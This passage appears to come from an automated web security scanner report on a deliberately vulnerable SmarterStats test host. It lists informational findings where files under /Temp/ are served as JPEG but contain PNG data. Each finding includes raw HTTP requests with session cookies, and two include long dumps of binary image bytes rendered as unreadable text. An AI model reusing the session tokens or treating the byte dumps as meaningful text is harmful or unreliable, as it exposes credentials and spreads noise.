Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:31:53 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BAE755A80"
Content-Type: image/jpeg
Content-Length: 8761
Connection: Close

.PNG

10.40. http://vulnerable.smarterstats.6.0.host:9999/Temp/a796b3465add49de8e0c091a308040ff.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/a796b3465add49de8e0c091a308040ff.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/a796b3465add49de8e0c091a308040ff.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"444009411","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 20:16:24 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB69812D2FDC00"
Content-Type: image/jpeg
Content-Length: 7789
Connection: Close

.PNG

10.41. http://vulnerable.smarterstats.6.0.host:9999/Temp/aa9f9504e4da409ebc871fa02f1cfc5d.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/aa9f9504e4da409ebc871fa02f1cfc5d.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/aa9f9504e4da409ebc871fa02f1cfc5d.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:31:53 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BAE755A80"
Content-Type: image/jpeg
Content-Length: 8473
Connection: Close

.PNG

10.42. http://vulnerable.smarterstats.6.0.host:9999/Temp/aae65ef47a3d4937bffc2e1dbe58c809.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/aae65ef47a3d4937bffc2e1dbe58c809.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/aae65ef47a3d4937bffc2e1dbe58c809.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:32 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8B4CAA00"
Content-Type: image/jpeg
Content-Length: 18895
Connection: Close

.PNG
.w.......?....D._2..lc.,3lWB..C./m~F|V...z.3|.y.....e..C.]...pq....i.eQ/M.x....8p7.'..%m.7.....>..Z..!~........"W.]C..G>.#....wB...?iG!.-.x. ...C..-[..M..~V8...6..9*}.o*W..%...?..K7y.l,[s.*.F+..$_.>.\..'...'.;..t..!..&.3]...e..o.....6t..P    .GV...!,.C.+2.8.KO..Z.=H......."..\.x....@...)&..nCc.....~...d.v.G..+^<.......|7..d...<7....m]..hq..^......Q.,....3.............B...r...R8....@.......    .[y../9'+......r.me.c....).t.5.*.. ,.|}d<...s..Zt..4../M<.Pd^...;.....:Pb....+^A.+IW7h@K_y...s.@....a.C.B.,$..TYd..B<.1.....$...\. l...Ub. lJl..    ........3m;../.-m....*!l.D..|...y..+..../.x.?%.....-.H.5cL....C_....j.6.....s..s.\..[Y.i.U6..rH.r.........Y...I".&.V..q........Bz#.a.[....'p..!..J.....$...OHN..|...[E_d.'...a...=.RJ.K..|..".x.....-.l..`a....i5i.*d...aU=.....R.$U..f{H.....[...J^.s.."T.]3.......<.dPU.QX%...).5P...I`..bj.zXv...G.=a...p.{.!......m..g..6....a.+.^....m...4(..E}..$m......!.j|I.fZ.i&kv3ZU2t.+9..w.Q....5..k.    ._...j.KN..2{....k.qc.......P....I..1<.'2m5.......o.!Dm)B...;......}....u%.l..Q.f.7.ak......,!k..<..@...I....vC.A@"06..:..qH....O..?.5g../2..t..+B/-C.d.c^.8...h...J...#...cY.f>.md.;4q..8Z
.. .b..6.7............u^~.!i...>........+2n.....0q........K...K_...K..1.C..5..6f]kz...x`@..TL.....C.A.    .....R.KL.C.6b.=I..W..~...B.
.q.?.-.Y......)..R.DJy$-+.....<..k..............M...........N..qE.I[..+.@.(.&7...
...J.4.......Q....pZt.+d.:.....M..........R.Y.d...r.d.jz..3QN..\j..I...[ .
.Z.A..,wY...JaW.A.....& .4......A.P..I.........>...0....6RTd|L..W!.dP...6.iL..G.$6....+-..5^.::.....T^.E.@...&.as..>...$`....-.:<.h.&JY..$kFi...8...DWW#.d e........Up.n.......
..)..D.@... l...k.............-f...9#..Ze...w!:7W.[,.A.."_.M....OW9.........5.=O(..(...M    ..2.....W.v..7e.Z/...A..e.(m.O."..C.W..2.|}2......=.q(x.5..H.D.3k.u.G.>..u.s.K..R.@....(.....K.....>m........d.(n.{R...TQ..!.A~.+.Yd..<X-+v.    s:.......F.i..;..... .$..6%.....n ....Y..Z._F_lm.....-c.aN....;...}L...HG?....?...%......MJkDc..._...=.....P.....Z.e..7......R.p*.z.~Ln....t...iTq-.a.....I.N..*l...iAA.Z.......]...~..^.....(...MI......    |....,..}...9i...........a...SGPj.o.......N.E^.^+Q...#?iD...tso..A...D.....@Y@.....{....H_ml........(o.U.n@.. {.....i..0....e...J.x.4.|S...........[...(...MI.......|..gteY.*..W;i3.[n......o.E;..J..?.....M8.C.W...3ki.N1../...]......QY.xN..|K..M.........Z.*.zS......'.....#.)c.O(.T.Z    .g..%.P......~%5....)..'.. ..:".a.Qc.. P..i.t...(.~..M:1a..Q.$...EI...uDgg...n.X...m.x.ia3f.....h:^h..4...\F.....    ...N.....[.....T..>.,.c..$.....Ab..<.qK.
!o.....N."..........?....8$m3/T..Um........X%.G..tB.....F5A@...EG)7..t?..k.mFyc.91B....v}#U........I.R6...V.....U+'[.&.mH.V4..Y......=..:]N..= ..*'.aSy... .j..m+.=.r..HO..mWH.    K..W....'.a..-...'...../C...,7..'.|....6.uh#\.6.7.@...M.....E.@.i....SALKi.......7c&.`.....CT.Gts...p..e    eN$J.U...D.......,[...4|}C....
.|BG_<...Fy../.......i.mQ3.p    .i.t...d.+.YM*+#wt ..qDgfPE~...&.Q...'........D...).j-hU...M>tx..Y..........lJ.n....x../B..........    @...<(..(...b..ss~C...7c..<..2..=UH...e.........^..|&*.P?.K.=...._.h..J......>.z..C....o......6    @............$I....L.9.'*.}.....<..3i..}9....uk....q>.HC..H.U..K2...........R...^..}..../...;[n|..\D..."..............4..q..........2.]In...5..1....;..o.;fu{..-8T...G...}_......=i.gf...Bfn...U...!l....{......q3......V......%.^.....Y.$%d.~LnE...#........z....x>.[^5J.K..L.e..g.X...9.....4e.....]\..M9......k..f..lV..!.a.a.^N.`...u..ni.\To. lzkq....D..'-?.H..........]-t.y{.P_..w6...d......xm=..8\...a.7..`...,....`.....V.l.n..Y6..+o,....2j&A.Y:.HCy.....fC.....-......M...*...    p..x......T..'M...y.........D<........l.l.b..V..Y..E&.l(.B.,.N.......,....).W.1.re6$Zc&.2sh%K..or[..s....+(.. ..V    <)H..7.*t..n{..5.......J.41..C.J.4.F....P....7.O....k.C.f.Um^..pi..Vf..aRS......eZx...Y.eUa.\Pa....]..;PU.........@.c.X.x...u.2R".v...^m....*x..s!.6lm"..,i<.........,Y.6sj..g...5.;WU..d....V....6.L8[~]..T... l...K...8N..Y.J.L.V.fM...2......x.x...u.."..66..g..^...R)ma".U.>t.~q...j..V3l.E....Is.j.of..E6..&sQr..6.C..._K}.u......... ....~......LI.n..!5.V..S..$OF....O..BW58.f.x.O\..p..x.uyh....(.[R....b.,J....^be...\..W.r-..,.0......=.|.wT.0_Uj....k..".+O-..9.J...W.,...+..P.....i.AQ..........J.d..;......jp6.............a....6..I....9..i..z
.*.......9..o....$...#wa=O....*....wf3\..W.7.....G0.& ...........|.......M...i.9Q.....^.Y.m..*......... lN@.G@..<C.8..3w.]@..@@.. l.m....tO.d.8i.(^ .. .w..6.......L. ....+.@..@@.. lz...?.(.@....o..(..(.....x....3.q....'....+l^..7|..@@{. l.kS...4A..i.&*.J....@-    @.j    .....p..l.....*...:    @...n(5.h..6..|... ......9..o......l..9.......    @...F(!.x...DZ..D7.....@a....>t}..i..... ...%.aSo... .~....R..g......[.......M5M......xQ..i........P,...b..........a.\..?... ....6.4.
..
$ g...DzjV.+1m....j.......*.K.H ...!.a..w....A...6u.B)A..@.3. l......:    @...n(5.....@.4...........0q)....p....yv.$.h...9lb_..<W.(.Dq].............<..^..L[.6.................E q......0.Y..f.Y.9{....#.....(...M.......    dR..~d.d..Uf...Xy......R.2s......{...5._..Q{.......).qP4..;...4I..2X.w...z......(...M.M.........a^...,.M.d....wFtV..Yy?......B    @...0(.....F..V9,....j.1....q..^.......@...J.....A.@....x......i.bu...ynr... .. .P..6.6.... PI@...Q.1.VC....mV... .. .P..6.6.... `23i.....9....a~.qH..yn...*S+..t....P(...B..............#...............(...M...............}..@..@..@...N.....B.@..@..@..@...>.. .. .. ..
'.aSx..x .. .. .. .aC................)..P<..............l.R.......IEND.B`.

10.43. http://vulnerable.smarterstats.6.0.host:9999/Temp/ab51ac96f4bc4739bd3a746f1b589cd7.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/ab51ac96f4bc4739bd3a746f1b589cd7.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/ab51ac96f4bc4739bd3a746f1b589cd7.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:39 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BEDA3AB80"
Content-Type: image/jpeg
Content-Length: 6349
Connection: Close

.PNG

10.44. http://vulnerable.smarterstats.6.0.host:9999/Temp/afa9a3022c3e456690253161fd12125c.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/afa9a3022c3e456690253161fd12125c.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/afa9a3022c3e456690253161fd12125c.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"444009411","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 20:06:01 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB697FB9D99A80"
Content-Type: image/jpeg
Content-Length: 6302
Connection: Close

.PNG

10.45. http://vulnerable.smarterstats.6.0.host:9999/Temp/b2972344c54b45e38070638051bc9478.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/b2972344c54b45e38070638051bc9478.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/b2972344c54b45e38070638051bc9478.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: "1CB682F87B92300"
Content-Type: image/jpeg
Content-Length: 7503
Connection: Close

.PNG

10.46. http://vulnerable.smarterstats.6.0.host:9999/Temp/b7378ea2600d4d34ad1d031c4003a06c.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/b7378ea2600d4d34ad1d031c4003a06c.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/b7378ea2600d4d34ad1d031c4003a06c.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:39 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BEDA3AB80"
Content-Type: image/jpeg
Content-Length: 7369
Connection: Close


10.47. http://vulnerable.smarterstats.6.0.host:9999/Temp/b970dd6404e94f54894db427147a64da.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/b970dd6404e94f54894db427147a64da.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/b970dd6404e94f54894db427147a64da.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"444009411","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 20:16:25 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB69812D2FDC00"
Content-Type: image/jpeg
Content-Length: 10437
Connection: Close


10.48. http://vulnerable.smarterstats.6.0.host:9999/Temp/b994a8c169af455497c7747bd9914800.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/b994a8c169af455497c7747bd9914800.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/b994a8c169af455497c7747bd9914800.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:33 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8B4CAA00"
Content-Type: image/jpeg
Content-Length: 19860
Connection: Close

~He>8+...M..<.S..L..M.,G.sA........W......`.....$..Yfh.y......D.I.X.%..6....O9.r..d.J...2K.\.V.ti.f.B$...l..n.4=.R..g..h;..D.]m...q(t.(...p.&l.. ..uC*...5m..k......6.ov7..Q......\l......../_...x...?N."...>. .....`s....,."..-..N.Pr..fG..zf...Y$:...r....6...@..%...R...1.3.O.....=m....IB.i..nlF.........M9.....JE...jyb.....+2F.M....p......g.:,..Y.......4...'28.....;.....^ `$..l..m..-........md...:nr...u.,.....v.DKK.8o...]4.`..e....mGzsj".9=Y3.[. )..p..!.B5c......".r..........czY..w.y.-........a..?.._/.i.r..Kv..i....k3g.$.....@.3..l.... .....p6..(...h.....    ..    .xm..)aeM.P8AS.....8...    ..[].:]..U..p..w..)s.{t.b..9.^...h...JE...k..y...75(..6..<..}...-...3.. Sb.#...J.~6S(t..I.E.....L.G.E.W.......[..~w..~..W{.(.~..@.S.Bg.6pX....X*..e...z..CcQ.d.wx...............5...y...........!...~........&e..bm.&..%.h...T$..7,.k..=..X...W{q.;.(h&....t|...A~..7.....nLL...7{.M........p....C..M.....x..K    .....Pw!....DH......5.h..0....)jh3*.%..e..~,B...`...{y.Y..D...Ft.`%.9..a....B....L`-.....D....k........... ..:...~...7......E9tz|(Q.t.......)......i.t....S...M..e.'N,......g..xo...-.    6.p+:....UpXl..p.]....A.].&..D..t.........`. ..6.........e.z.~.PG.hKn)B......>..i_K..u......i[p.K.br%./.Zx..w.*B....m..-.^.    .+.L.... :..].;=.a....eo..........k))).5......-.6..6m..Z....g..Q...T&..............3S.P..5h.......P
.Z..GEy.V.....=...Y>....:.k&.....g*....-...\lw..U....B....wU... ....6uy.n .5...F.h.sb.....j.........:M.Hy.......jWBC).ae.{...-..U{Y..%.v.dui;+.GFF...ad^.fO.m..U*....@@}..l.3..A.k.....oWWW.i.......!..a.....
..3\7b.....?.}....!..m.?.....'<l.^.....$...R.2.Wv...5..<y"....Pk.....{...z....N.........._~~J.3+..M....7..hc..=G]..;..&....f....k@.F.....z....f..L.S...m.........g......]....\.#J..y#y.p..............6.p.]A.k.x=[........)...b.UQ...<..qb.................u..Xo...:i...V..Q.1Z2O5{.p.Kb.......=.....YTT$.6.&..{7-]...{.. ...    @.av...    <H......{... B.I^6!.<..G.R...I[....Xc..u.K.;.
=..=_.!.5.wD}zU....|..;J..*.[....P....e.6u.T..Iq...x........ .U..6~A.,..5..{.^...e...../%.oN..........S........D..44.O......o.9..fK..n.Y....nM.$..m8@...K....|qw..*.+K...kj.(.. ...m{..H
.&...kk?....,.obc}f...KC..#...h...0._.5.S;.8.O....7..........q.....NB.._......h.a...%{.:H
.n..G{.D..z..LG...b....v.G7)4...B........&/...3...O?..o... .....`..!n...%...{.;..K.......N...B.)2.........[....uo......]..e.|j.E.ve..t..0z.$F..D..{.\.k..zfW%z..e.NR<..@.c..l.#.@...L....-.5O[r+...D..9....P.....a..m)|tC*^...v%,...*..o.;.'..........&.|.;.k.=...P....*.q...?...3(7..rY.    o...B.....:*.
......i....as......Q.....v....|..lK.........{.X....!=.....-...P....*.q........-....79.....K.Y.....%..L.....%..R....".X >.k.V..&B.#EX4....w9...nM.Zk...h......`.<...#..h.[Y.X.F.E..2+N.G;g...x.(.lOQ4q....x........wK.oc...>.{.La....Hw.....Fw@.. .0.@ .    x$.v. :=I..e.*m(...B......,    8.,....3...Z.7;.....6._.....g..h'...'.d%@............8..%.0...6..=z...L...}G...L.._
......>.H...6......^.7{(..Rh4...(l..X.....A./>!.j.
.h.....3...6.9:l$.,.x..g.5\.....xy..2..h..0Jy.4 m....9..=JH.......t...uK.}.[G*....M...f.7.}5...6#.2.hh.Rq..5.$..b..jK.::..(.Tm
.....w.Jy..&..lzJ7.3..=^....k.
G..k..K..~-:.!....7.....Lr-.;.@....G.....[.(............Hw.WQ$....+.^..$.L.....n..C"<.(.muN(.....b...)t.sg.Xc.v.];...>.O..H......SZ9]...........l.1....("P.2.....j.P.....kr..y5X
...f..m....qj.z......g~.^.B..a.?3.6.UM.s(........jf_...C.)z=p..h...........    .do.........R...~..].f.os.v..w.).8^..2.]Q.d>=^..k.._..2..P..6G.Q^.....=.Otyb@.........@.ij8......4g.GT.[."Dzv....-.8.kr....-w..Q!..h}bk............(.5`.".f.m.B..2...]..%..2c|&.J.P..    t..q...\'2h..`.,q.w8......[`./z...    ..=.rg..8....J.a..].kr.6.Jk.P8...W..F.oF.CC.d....h.L.. .).....<4.....~..N.U..u4.>.m.l.....    @....7..}..=H.F...Q.
..4[g.....Q.m1.{.F.6..g4i|.z.i.GV..H...).kW.<j....F.Nz..o.3=y......hS"....    .#....A..........I...."...k.........7.[:G...2A..U.....\'...:3\...G....4{m....E.N.q..f-.._.L..L....*.......?....]7...?g....J.;uRE....i..67h@.:./...$..hS*.."..S...N......VljQiw...Y|...wa.]j..~..Y..!....6.8.....S....<'...9C..........i.}..6M....p.. q.}h..i..(QS..p).L.HO.lQd%.7...s.`.0UE.....Q#ZU.........k.M.`..s...T..H.    -.`.s..}3    >K.W..+....gfj.W..(S.7i..u......0.. ..`.D.... .....9s    u..J...PM...o\.7.`4.}0.2.'..:M.H.kW.....4^..@$.xK..X;..    ..Q.2f..D.=...d....?.@...x;,.PE.....S."......q#db..w.7!.L.N.. .|6.. ..@...W.@.....o)|SO....a.i......h}.x.s..v....ZP.R......K....T4}:...N.={.....^-.uk.(..[.u.....d^.....*...2$j......Y...T.i.B.e...~....@F...7..6}..Z..^'.a.....~I5)....l....|>.J.Z.......m......(.......,D..k....M.f.>^.gr....-.
.U....Tu.
.>).<..(`>.E..z4.!....,...s*.l.a..P.v....C...=.........6..6o...A @.....z..I}......{.....u%.%..N."....\.u..N.......>..D.qB.N!....I....../.d....$..Y.2....e...gr.....p..DK[...    4...{..%.....i.....G...........,kL}W.W..).y...q..*...hA..6....S...>]...)......A...h...@....T.p.y.._.mj.6.e.5.....c..S...\...]...S..@..."....6\.. `"..m....m.G4`ku..sSK....~..t.C.*.......4......t..9L..........G.p1....@....>}......5i...U....@...g..QrH#...I.q....?......F..41a@..@.-..lna.E ....\.w....F.DV..KG...y..;.
.w...`...C.#...d.vp..s.g..    ...5...P....j(q#...k.\...KC.}J.g.K....~[>....[..w.G4....
.s-[J"...q..a!..ff..|...}.bR.....*. .T......(!....m<....l%    8.4...._...B.C.L_..l!.8..;.$..+    .EU..j.6.E..uiq......48..@.....`..........q......t...,...ZR].q...0....;[.....O~...a..78a.......%K$....Q.....i._... ...E..-.........d.>...v.y.'.8..q..wX`!..TNd...4...I\N..z.....>...t=.C.g..j.3..7zB=:6m...L.m../    .....nL.`......`....E `(...-f.x.}.P*'2...$.96Nj.r"l.....d.r5}f...z..|...yw..xQ..o...jL.Y....    @....w...p...5.m.zp8......xB....z...@.c.....h...Z]..U.v.........6...c@.......g......&.C.z.....D.A...G...{lqg...'.x..........+......Ot..@.{. ....w...pB`.............&......p......p........h'..0...gOE.v]fq?."..G.me.N(..tm..*8..)....^..{.........v.:..!..6.......@...... .....\@....~..?J....l6....c.../..D...I...:    ...>\... ..vh.1..6...61.....b.x.........w...).X.....'...c.e....[IR..S..$Wb6...t(...atHvO...\.em        .U......Z#=....e^B....(.n .u..l^G......"`*`k$:......Tu.l...f...
..X.D.Ih....w..5    )+/.....M..{.R..Y ....^..Y.].:u.........&...m..?...M..]c/........Q.....5l.....&.eZ.=Ka....a..sr.V>d..J......Dmz...a.K..oJG........F...I...N.........g.....:.i.$q.E.,..(f..Y.....aTcR"=.....J....3+.@s.Z}(....#[.r...9.|V...=..St"._.ulF:8..Hl(?.bE......fHT&...+..K..-.nI    .f...#$]/..Zz..
6.Ai-...*.    6.NO..BWq*.........y^!..@'Kq&    ).o,.LOd1".oWZb.fV.......n..`c.e%..{.D.U...b65Vd..f.3~.....s.........8T `'q.B.)....R..,......Y{..x......M. .    .............6.....J....(.s.R...5....'I.....A3y..y...[...oeB.J...1..T...x..Y|....Km    M.h.....$....E..|V.96..J...............[...Ik.l.7..D.o..$.P...6..T....z...|I......,/....I...>E.T.J4..Z.....O.7...f..*wO.B.B8..YM"..7.....Ey..y.db..gV....6...w9....%u.lf...K.Y.aL..KC.....Q........:pr.\.u..L...Y.....>.f.:............`.. .    ..0.c.{...(...'.......b.RpY^W.M+.1sto....>.S.z.MOYY...g..d.@..PN.......eN..}Dq..@I.(....G....z..5Z    ..".....@k<!`
y..4    0Ix.!b. .
6.....8..Z.X..yB.)tiC....~..I@9Hf(..Z.Cw=l...9K..d.p.N...U.;.p!.t2.h.N.@..d..L%..(...2..Ld.([.f.E..7..`.ZSx.\...u.u`.......]_n....&O<0....r.`[............P.....Dq??.(SZ..`.g!l....<k..`..H.'...m...6....,.a..Vm..w+K..6?.]<..@.....`..    (.6..K.(...D.IaQ!...w.H((.uj)(.....Vk.f..<..vH..:l........4.............    M.........06..6c.?z...%PDk....5E....Jo.....5..V(e8....%.k..... ...l.. ...$`.fV....#.......!|.. .a..l...4..M .B.
